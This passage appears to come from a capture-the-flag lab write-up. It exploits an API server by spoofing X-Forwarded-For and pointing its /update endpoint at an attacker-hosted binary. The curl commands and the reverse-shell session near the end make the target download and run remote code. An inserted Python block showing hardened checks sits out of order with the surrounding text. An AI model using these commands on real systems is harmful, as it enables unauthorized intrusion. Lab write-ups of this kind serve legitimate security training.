SSRF to RCE


The target API server has been confirmed to be vulnerable: the /update API endpoint accepts a binary from a caller-supplied URL and executes it as part of an update. The /update endpoint has only a weak authentication mechanism based on the user parameter, and a valid system user was identified through the /logs API endpoint, which is intended for internal use only. That restriction can be bypassed by leveraging the X-Forwarded-For header to trick the application into treating the request as if it originated from localhost.
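As an added example (not code from this writeup or from the target application), the check pattern behind the /logs bypass, in Python because the server runs under gunicorn: a localhost-only check that reads X-Forwarded-For, beside a hardened version that honours the header only when the TCP peer is a known reverse proxy, plus an allowlist check for the update URL. The function names, the trusted-proxy address and the allowlisted update host are assumptions; the sample request mirrors the curl call above and is constructed for the demo.

```python
"""Added example, not from the original writeup: why trusting X-Forwarded-For for a
"localhost only" decision fails, and what a hardened check looks like.
Assumptions (not on the page): a Python/WSGI app, the only inputs to the check are the
client's socket address plus request headers, and the trusted proxy / allowlisted host
names below are placeholders."""
import ipaddress
from typing import Mapping, Sequence
from urllib.parse import urlsplit

LOOPBACK = ipaddress.ip_network("127.0.0.0/8")


def _is_loopback(addr: str) -> bool:
    """True for any 127.0.0.0/8 address; malformed input is never 'internal'."""
    try:
        return ipaddress.ip_address(addr) in LOOPBACK
    except ValueError:
        return False


def is_internal_weak(remote_addr: str, headers: Mapping[str, str]) -> bool:
    """Vulnerable pattern: the header is client-controlled, so any remote caller that
    sends 'X-Forwarded-For: 127.0.0.1' is treated as if it came from localhost."""
    claimed = headers.get("X-Forwarded-For", remote_addr)
    first_hop = claimed.split(",")[0].strip()   # leftmost entry is whatever the client wrote
    return _is_loopback(first_hop)


def is_internal_strict(remote_addr: str, headers: Mapping[str, str],
                       trusted_proxies: Sequence[str] = ()) -> bool:
    """Hardened: use the socket address unless the peer is a trusted reverse proxy; in that
    case use the entry the proxy appended (the rightmost one), since earlier entries can be
    forged by the client. Without a proxy in front, the header is ignored entirely."""
    if remote_addr not in trusted_proxies:
        return _is_loopback(remote_addr)
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    return bool(hops) and _is_loopback(hops[-1])


def update_source_allowed(url: str, allowed_hosts: Sequence[str]) -> bool:
    """/update fetched and ran code from a caller-supplied URL. Pin the scheme and host to
    a fixed allowlist so the server never downloads from an arbitrary address (verifying a
    signature on the artifact would be the next layer)."""
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.hostname in allowed_hosts


# Constructed sample: a remote client (address taken from the curl session above) claiming
# to be localhost via the header, as the bypass in the writeup does.
SAMPLE_REMOTE = "192.168.45.215"
SAMPLE_HEADERS = {"X-Forwarded-For": "127.0.0.1"}
TRUSTED_PROXY = "10.0.0.2"                       # assumption: address of the reverse proxy
ALLOWED_UPDATE_HOSTS = ("updates.example.internal",)  # assumption: pinned update host


def evaluate_sample() -> dict:
    """Run both checks over the constructed sample so the difference is visible."""
    return {
        "weak_check_grants_access": is_internal_weak(SAMPLE_REMOTE, SAMPLE_HEADERS),
        "strict_check_grants_access": is_internal_strict(SAMPLE_REMOTE, SAMPLE_HEADERS,
                                                         (TRUSTED_PROXY,)),
        "update_url_allowed": update_source_allowed("http://192.168.45.215/update",
                                                    ALLOWED_UPDATE_HOSTS),
    }


if __name__ == "__main__":
    for name, verdict in evaluate_sample().items():
        print(f"{name}: {verdict}")
```

The strict variant only consults the header when the connection actually arrives from the configured proxy; a direct connection from a remote address is judged by its socket address alone, which is what defeats the spoofed header.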

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/xposedapi]
└─$ curl -X POST -i http://$IP:13337/update -H 'Content-Type: application/json' -d '{"user":"clumsyadmin", "url":"http://192.168.45.215/update"}'
HTTP/1.1 200 OK
Server: gunicorn/20.0.4
Date: Thu, 06 Feb 2025 18:22:09 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 81
 
Update requested by clumsyadmin. Restart the software for changes to take effect.

The target API server then issues a GET request for the supplied update URL and fetches the payload.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/xposedapi]
└─$ curl -X POST -i http://$IP:13337/restart
HTTP/1.1 200 OK
Server: gunicorn/20.0.4
Date: Thu, 06 Feb 2025 18:24:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19
 
Restart Successful.

Restarting the service runs the fetched payload, and the listener receives a connection:

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/xposedapi]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.209.134] 50800
whoami
clumsyadmin
hostname
xposedapi
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.209.134  netmask 255.255.255.0  broadcast 192.168.209.255
        ether 00:50:56:9e:c2:68  txqueuelen 1000  (Ethernet)
        RX packets 10484079  bytes 1014328857 (967.3 MiB)
        RX errors 0  dropped 1301  overruns 0  frame 0
        TX packets 10449999  bytes 1204935346 (1.1 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial foothold established on the target system as the clumsyadmin user by exploiting the vulnerable API server.